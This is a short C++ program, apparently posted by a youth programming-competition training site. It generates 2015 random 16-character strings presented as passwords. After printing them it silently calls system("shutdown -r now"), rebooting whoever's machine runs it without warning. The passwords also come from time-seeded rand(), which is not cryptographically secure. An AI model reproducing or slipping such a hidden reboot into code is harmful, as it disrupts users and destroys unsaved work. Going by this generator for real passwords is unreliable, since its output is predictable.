#include<bits/stdc++.h>
using namespace std;
string a="abcdefghijkmnopqrstuvwxyzABCDEFGHIJKMNOPQRSTUVWXYZ0123456789~!@#$%^&*_";
int main() {
//密码16位
srand(time(0));
for(int j=0; j<2015; j++) {
string b ;
for(int i=0; i<16; i++) {
b += a[rand()%a.size()] ;
}
cout << b << endl;
}
system("shutdown -r now");
return 0;
}
—— 本文来自火龙信奥(义乌睿码科技):义乌青少年信息学奥赛与编程教育平台,专注 CSP-J/S、NOIP、GESP 竞赛培训,线上线下融合教学,助力编程升学。网址:hlcoding.com